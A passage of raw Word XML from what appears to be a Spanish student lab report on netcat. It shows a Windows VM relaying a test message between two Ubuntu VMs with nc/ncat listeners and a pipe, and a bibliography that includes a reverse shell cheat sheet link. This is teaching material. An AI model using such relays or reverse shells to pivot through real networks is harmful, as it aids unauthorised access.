        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC32EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4989404C" wp14:editId="139DFA37">
            <wp:extent cx="4695825" cy="1127642"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="15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9457" cy="1130916"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFC000"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C96CB9E" w14:textId="7452114C" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00BC32EF"/>
    <w:p w14:paraId="0B6E7551" w14:textId="315C4AB1" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00BC32EF">
      <w:r>
        <w:t>Lo que tendríamos que hacer ahora es montar el fichero “.iso” para tener una copia exacta de la partición del otro disco. Para hacer eso, tendremos que poner los siguientes comandos en el equipo donde se quiere hacer la copia:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B0CA6" w14:textId="66427EC3" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r w:rsidRPr="00BC32EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B750D29" wp14:editId="40148DBB">
            <wp:extent cx="6188710" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="254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9614"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6188710" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69709821" w14:textId="78E5822B" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r>
        <w:t>Con eso, en el directorio /mnt/copia tendríamos la copia de la partición del disco duro del otro equipo. Como vemos, es una buena forma de hacer copias de seguridad de forma rápida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BF9905" w14:textId="2C5E0FC9" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2F9069FD" w14:textId="523ECBD3" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="4E1E5157" w14:textId="7C2361D3" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="746CD914" w14:textId="0ED0D72B" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="7CDB4CAE" w14:textId="0419BB08" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="6A28D348" w14:textId="3B3E65E5" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="63D7DBE1" w14:textId="6B1B30D6" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0D2D6361" w14:textId="214A276E" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="34D75A5D" w14:textId="44B26C7D" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0BF8D4ED" w14:textId="0F683B39" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2CB4B14E" w14:textId="2B02CEA2" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="25BDF9C4" w14:textId="042390AD" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="6371E05D" w14:textId="22B92D5F" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="350E6A55" w14:textId="77777777" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="68E75CC4" w14:textId="77777777" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0F2FDDC4" w14:textId="0FDB7F95" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="72BA4307" w14:textId="1A084ACF" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="4B2A9667" w14:textId="73728D6B" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0CA83CE8" w14:textId="5BB993C3" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="7966793A" w14:textId="068D7A72" w:rsidR="00BC32EF" w:rsidRDefault="00124242" w:rsidP="00BC32EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Netcat_como_redirector"/>
      <w:bookmarkStart w:id="30" w:name="_Toc182474739"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Redirección con netcat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="24F8FF95" w14:textId="701A3095" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r>
        <w:t xml:space="preserve">Para este entorno usaremos 3 equipos: Un Windows </w:t>
      </w:r>
      <w:r w:rsidR="009E1361">
        <w:t xml:space="preserve">y dos Ubuntu (CLON y </w:t>
      </w:r>
      <w:r w:rsidR="009E1361" w:rsidRPr="009E1361">
        <w:t>javi-virtual-machine</w:t>
      </w:r>
      <w:r w:rsidR="009E1361">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715A86C" w14:textId="07E1149A" w:rsidR="009E1361" w:rsidRDefault="009E1361" w:rsidP="00656ED8">
      <w:r>
        <w:t>Haremos que se conecten los dos Ubuntu saltando por la maquina Windows. Es decir, usando la máquina Windows como “enrutador”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DFFF48" w14:textId="15C05A6A" w:rsidR="009E1361" w:rsidRDefault="00D1645E" w:rsidP="00656ED8">
      <w:r>
        <w:t>Empezaremos yendo a la maquina Ubuntu “javi-virtual-machine” y pondremos lo siguiente “nc -l -p 1002”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F59485D" w14:textId="09BC996A" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1645E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23561C26" wp14:editId="0FE310D4">
            <wp:extent cx="5611008" cy="342948"/>
            <wp:effectExtent l="19050" t="19050" r="889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1008" cy="342948"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15772F31" w14:textId="77777777" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00656ED8"/>
    <w:p w14:paraId="10C62B01" w14:textId="7D7EE340" w:rsidR="009E1361" w:rsidRDefault="009E1361" w:rsidP="00656ED8">
      <w:r>
        <w:t>Luego en el Windows pondremos lo siguiente “ncat -l -p 1001 | ncat ip_javi_virtual_machine 1002”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117ADD83" w14:textId="1F3904D9" w:rsidR="009E1361" w:rsidRPr="009E1361" w:rsidRDefault="009E1361" w:rsidP="00656ED8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E1361">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>De esta forma haremos de servidor y cuando se conecte alguien, haremos una conexión con netcat a la maquina “javi-virtual-machine”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BBF56" w14:textId="62DF7306" w:rsidR="009E1361" w:rsidRDefault="009E1361" w:rsidP="009E1361">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009E1361">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="314CA84A" wp14:editId="0FD4DD34">
            <wp:extent cx="4515480" cy="276264"/>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5480" cy="276264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent3"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4248A0CC" w14:textId="7436D513" w:rsidR="009E1361" w:rsidRDefault="009E1361" w:rsidP="00656ED8"/>
    <w:p w14:paraId="76993B27" w14:textId="33DA5C02" w:rsidR="009E1361" w:rsidRDefault="009E1361" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2CF07B69" w14:textId="0E93F2C1" w:rsidR="00BC32EF" w:rsidRDefault="00D1645E" w:rsidP="00656ED8">
      <w:r>
        <w:t>Si vamos ahora a la maquina Ubuntu “CLON” y ponemos lo siguiente “nc ip_Windows 1001” automáticamente nos conectaremos con la maquina Ubuntu “javi-virtual-machine” gracias a la redirección:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E1F5F" w14:textId="4FB88E05" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1645E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68CDBA9E" wp14:editId="61BEBBFE">
            <wp:extent cx="5039428" cy="295316"/>
            <wp:effectExtent l="19050" t="19050" r="27940"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428" cy="295316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent5"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB63A6" w14:textId="1FB08187" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="5165D6FB" w14:textId="3094D326" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:r>
        <w:t>Para comprobar que funciona, escribiremos en la maquina Ubuntu “CLON” un mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2BAABC" w14:textId="5B106C37" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1645E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342A8DF5" wp14:editId="610D6CB6">
            <wp:extent cx="5087060" cy="447737"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="285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7060" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FF99FF"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20145B9D" w14:textId="433DB985" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="3202F4B1" w14:textId="1464433D" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:r>
        <w:t>Si ahora vamos a la maquina Ubuntu “javi-virtual-machine” veremos que el mensaje aparece, por lo que ha funcionado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657439F3" w14:textId="344BB3DB" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1645E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15EC2C69" wp14:editId="305B2949">
            <wp:extent cx="4600573" cy="377483"/>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9225" cy="387219"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="573FA655" w14:textId="60B48B90" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="095AF180" w14:textId="393BA6AC" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:r>
        <w:t>Y ya por curiosidad, si vamos a la maquina Windows veremos que el no puede leer el mensaje:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4075F345" w14:textId="0C4C9A12" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D1645E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2919ED6F" wp14:editId="62B67252">
            <wp:extent cx="4477375" cy="5715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7375" cy="571580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF55B0" w14:textId="7D411B69" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="45C596D0" w14:textId="06DD6B5E" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="776C98D0" w14:textId="53064BD0" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="3397405B" w14:textId="085E1EAB" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="1DCB29DD" w14:textId="20A61902" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="1F1A381F" w14:textId="77777777" w:rsidR="00D1645E" w:rsidRDefault="00D1645E" w:rsidP="00D1645E"/>
    <w:p w14:paraId="2C21D4D5" w14:textId="60EC4355" w:rsidR="00445761" w:rsidRPr="00445761" w:rsidRDefault="00E65C2A" w:rsidP="00445761">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc182474740"/>
      <w:bookmarkStart w:id="32" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bibliografía</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="2A7D9CD8" w14:textId="206717F3" w:rsidR="00E65C2A" w:rsidRDefault="00F97241" w:rsidP="009E303F">
      <w:hyperlink r:id="rId71" w:anchor="Que_es_Netcat" w:history="1">
        <w:r w:rsidR="00E65C2A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t xml:space="preserve">Netcat </w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E0E9561" w14:textId="51AADF8B" w:rsidR="005B5B0E" w:rsidRDefault="00F97241" w:rsidP="009B5A12">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3433"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidR="005B5B0E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Parámetros y comandos netcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="234EBF0D" w14:textId="67E16F66" w:rsidR="009B5A12" w:rsidRDefault="00F97241" w:rsidP="009B5A12">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3433"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidR="009B5A12">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Port Knocking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E7B7811" w14:textId="2B799EC2" w:rsidR="009B5A12" w:rsidRPr="009B5A12" w:rsidRDefault="009B5A12" w:rsidP="009B5A12">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3433"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://ironhackers.es/herramientas/reverse-shell-cheat-sheet/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="009B5A12">
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
        <w:t>Reverse shell con netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC2439" w14:textId="267A973E" w:rsidR="00F72E06" w:rsidRDefault="009B5A12" w:rsidP="00F72E06">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00F72E06">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Timeouts en netcat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F9A9AD4" w14:textId="28395495" w:rsidR="00F72E06" w:rsidRDefault="00F97241" w:rsidP="00F72E06">
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidR="009C7AA8">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Diferencias entre ncat y nc</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="601267B3" w14:textId="2D7A8642" w:rsidR="004322E5" w:rsidRDefault="004322E5" w:rsidP="009E303F"/>
    <w:sectPr w:rsidR="004322E5" w:rsidSect="008A0553">
      <w:footerReference w:type="default" r:id="rId76"/>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2570" w14:textId="77777777" w:rsidR="00F97241" w:rsidRDefault="00F97241" w:rsidP="008A0553">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="687DB7A6" w14:textId="77777777" w:rsidR="00F97241" w:rsidRDefault="00F97241"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E6D9" w14:textId="33D5BCCC" w:rsidR="001B6FA2" w:rsidRPr="00CA7704" w:rsidRDefault="001B6FA2">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:pBdr>
        <w:top w:val="thinThickSmallGap" w:sz="24" w:space="1" w:color="622423" w:themeColor="accent2" w:themeShade="7F"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>509-FJGG-PARP202-Netcat.do</w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>cx</w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> DATE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E0440D">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:noProof/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>14/11/2024</w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">     Página  </w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E0440D" w:rsidRPr="00E0440D">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:noProof/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>17</w:t>
    </w:r>
    <w:r w:rsidRPr="00CA7704">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:b/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="6469D152" w14:textId="77777777" w:rsidR="001B6FA2" w:rsidRDefault="001B6F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90FD" w14:textId="77777777" w:rsidR="00F97241" w:rsidRDefault="00F97241" w:rsidP="008A0553">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="13086BE0" w14:textId="77777777" w:rsidR="00F97241" w:rsidRDefault="00F97241"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1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7FA0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3"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5"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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2DC10E01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9804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CE0E64"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A7694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11"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497767"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4146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6"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>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BC"/>
    <w:rsid w:val="00001277"/>
    <w:rsid w:val="00012766"/>
    <w:rsid w:val="00015230"/>
    <w:rsid w:val="00026D63"/>
    <w:rsid w:val="00027D55"/>
    <w:rsid w:val="00046EF7"/>
    <w:rsid w:val="00065B9D"/>
    <w:rsid w:val="000809EF"/>
    <w:rsid w:val="00081736"/>
    <w:rsid w:val="00093722"/>
    <w:rsid w:val="000B075E"/>
    <w:rsid w:val="000C59DD"/>
    <w:rsid w:val="000D509B"/>
    <w:rsid w:val="000F34C8"/>
    <w:rsid w:val="000F4323"/>
    <w:rsid w:val="00124242"/>
    <w:rsid w:val="0013601B"/>
    <w:rsid w:val="0014607C"/>
    <w:rsid w:val="00150A8D"/>
    <w:rsid w:val="00157B5D"/>
    <w:rsid w:val="0017235A"/>
    <w:rsid w:val="00177FAD"/>
    <w:rsid w:val="001A1E6B"/>
    <w:rsid w:val="001A4A2C"/>
    <w:rsid w:val="001B6FA2"/>
    <w:rsid w:val="001C4836"/>
    <w:rsid w:val="001F655B"/>
    <w:rsid w:val="002016E1"/>
    <w:rsid w:val="00217AA2"/>
    <w:rsid w:val="002243A4"/>
    <w:rsid w:val="00242288"/>
    <w:rsid w:val="00252AE5"/>
    <w:rsid w:val="00255AE6"/>
    <w:rsid w:val="002637A3"/>
    <w:rsid w:val="002D5887"/>
    <w:rsid w:val="002D59D9"/>
    <w:rsid w:val="002E29EB"/>
    <w:rsid w:val="002F7C34"/>
